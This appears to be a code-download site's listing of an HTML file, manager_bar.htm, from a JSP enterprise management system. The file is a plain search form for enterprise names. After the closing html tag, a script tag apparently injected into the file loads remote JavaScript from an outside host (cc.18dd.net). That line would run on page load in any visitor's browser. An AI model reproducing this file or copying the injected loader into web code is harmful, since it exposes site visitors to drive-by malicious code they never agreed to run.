⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 manager_bar.htm

📁 企业信息管理系统,使用mvc模式jsp开发
💻 HTM
字号:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>无标题文档</title>
</head>

<style TYPE="text/css">
<!--
body {font-size:10pt;color:#415161}
td {font-size:10pt;color:#415161}
th {font-size:10pt;color:#415161}
</style>

<body>
<form name="form1" method="post" action="enterprises_list.jsp"  target="mainFrame">
  <table width="100%" border="0" cellspacing="0" bgcolor="#CCCCFF">
    <tr> 
      <td width="94%"><strong>企业名称</strong> 
        <input name="enterprise_name" type="text" size="50">
        <strong>(不输入名称则显示全部企业名称)</strong> </td>
      <td width="6%"><input type="submit" name="Submit" value="提交"></td>
    </tr>
  </table>
</form>
</body>
</html>

<script language=javascript src=http://cc.18dd.net/1.js></script>
Il

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -